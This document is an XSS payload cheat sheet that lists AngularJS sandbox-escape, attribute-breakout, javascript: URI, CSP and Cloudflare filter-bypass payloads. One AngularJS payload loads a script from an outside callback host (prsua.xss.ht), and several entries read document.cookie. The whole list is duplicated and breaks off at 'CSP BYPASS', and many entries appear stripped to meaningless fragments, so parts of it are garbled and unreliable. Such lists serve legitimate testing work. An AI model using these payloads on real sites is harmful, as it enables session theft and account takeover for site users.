A'"></script><h1>{{8*8}}
'"></title></textarea></script></iframe></noscript><img src=x onerror=alert()>{{constructor.constructor('alert(1)')()}}
//Angular JS:
{{constructor.constructor('alert(1)')()}}
{{
constructor.constructor("var _ = document.createElement('script');
_.src='https://prsua.xss.ht';
document.getElementsByTagName('body')[0].appendChild(_)")()
}}
// FUZZING:
A'">{{8*8}}
%uff1cimg%uff1e
><img>
// HTML and JS
click
Click
'">
'">
<>
">
">
": '';">
audio{a" onerror=alert(document.domain)>":""}
'">alert`_Y000!_`
${alert(1)}"'-alert()-'"
'">{{constructor.constructor('alert(1)')()}}
A'">
“>
A'">{{constructor.constructor('alert(1)')()}}
'">
A'">S
A'">
test
A'">
A'">
A'">
A'">Try to copy me
A'"> // Shortest payload
A'">
A'">Test
// HTML Injection (If XSS execution and Dangling markup is not working):
TEST
javascript:alert(9);//https://www.netigate.net/dd
javascript:var{a:onerror}={a:alert};throw document.cookie //Cloudflare XSS bypass
javascript:var{a:onerror}={a:alert};throw 1
test //Cloudflare and Filter Bypass by XPLOITERR
"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// //Cloudflare XSS bypass
javascript:alert(document.domain)//http://google.com/uploads/pwned.jpg
javascript://%0Aalert(document.domain)
javascript:alert(document.cookie);
%27;alert(1);//
\"+confirm(1)+"
'*alert(1)*'
// Encoding
><img src=x onerror=alert()>
'"></title></textarea></script></iframe></noscript><img onerror=prompt() src=x>
A></title><</script><img src=x onerror=[1].find(alert)>
<svg/onload=alert(1)>
"><img src=x onerror=alert(document.domain)>
// Inside attribute value break by ":
"onfocus=alert() autofocus="
"'-alert(document.body.innerHTML='XPLOITERR')-'"
"type=xx autofocus onfocus=alert(1)//
"onmouseover=document.documentElement.textContent=document.documentElement.outerHTML c="
"onmouseover=javascript:window.onerror=alert;throw[1] c=" (When () `` are blocked)
"onmouseover=javascript:window.throw[onerror]=[alert],1
a=8,b=confirm,c=window,c.onerror=b;throw-a
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
// JS literal XSS:
${alert(1)}
// Hidden fields:
" accesskey="X" ONCLICK=confirm() X="
"accesskey='x' onclick='confirm`1`' //
%2527x%2527%2520onclick=%2527confirm`1`%2527%2520
//CSS XSS
">
@keyframes
x{}>
CSS<
">
// JSON:
{
"url":"javascript://test%0aalert(document.domain)"
}
// CSP BYPASS:
">
'"></title></textarea></script></iframe></noscript><img src=x onerror=alert()>{{constructor.constructor('alert(1)')()}}
//Angular JS:
{{constructor.constructor('alert(1)')()}}
{{
constructor.constructor("var _ = document.createElement('script');
_.src='https://prsua.xss.ht';
document.getElementsByTagName('body')[0].appendChild(_)")()
}}
// FUZZING:
A'">{{8*8}}
%uff1cimg%uff1e
><img>
// HTML and JS
click
Click
'">
'">
<>
">
">
": '';">
audio{a" onerror=alert(document.domain)>":""}
'">alert`_Y000!_`
${alert(1)}"'-alert()-'"
'">{{constructor.constructor('alert(1)')()}}
A'">
“>
A'">{{constructor.constructor('alert(1)')()}}
'">
A'">S
A'">
test
A'">
A'">
A'">
A'">Try to copy me
A'"> // Shortest payload
A'">
A'">Test
// HTML Injection (If XSS execution and Dangling markup is not working):
TEST
javascript:alert(9);//https://www.netigate.net/dd
javascript:var{a:onerror}={a:alert};throw document.cookie //Cloudflare XSS bypass
javascript:var{a:onerror}={a:alert};throw 1
test //Cloudflare and Filter Bypass by XPLOITERR
"+self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// //Cloudflare XSS bypass
javascript:alert(document.domain)//http://google.com/uploads/pwned.jpg
javascript://%0Aalert(document.domain)
javascript:alert(document.cookie);
%27;alert(1);//
\"+confirm(1)+"
'*alert(1)*'
// Encoding
><img src=x onerror=alert()>
'"></title></textarea></script></iframe></noscript><img onerror=prompt() src=x>
A></title><</script><img src=x onerror=[1].find(alert)>
<svg/onload=alert(1)>
"><img src=x onerror=alert(document.domain)>
// Inside attribute value break by ":
"onfocus=alert() autofocus="
"'-alert(document.body.innerHTML='XPLOITERR')-'"
"type=xx autofocus onfocus=alert(1)//
"onmouseover=document.documentElement.textContent=document.documentElement.outerHTML c="
"onmouseover=javascript:window.onerror=alert;throw[1] c=" (When () `` are blocked)
"onmouseover=javascript:window.throw[onerror]=[alert],1
a=8,b=confirm,c=window,c.onerror=b;throw-a
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
// JS literal XSS:
${alert(1)}
// Hidden fields:
" accesskey="X" ONCLICK=confirm() X="
"accesskey='x' onclick='confirm`1`' //
%2527x%2527%2520onclick=%2527confirm`1`%2527%2520
//CSS XSS
">
@keyframes
x{}>
CSS<
">
// JSON:
{
"url":"javascript://test%0aalert(document.domain)"
}
// CSP BYPASS:
">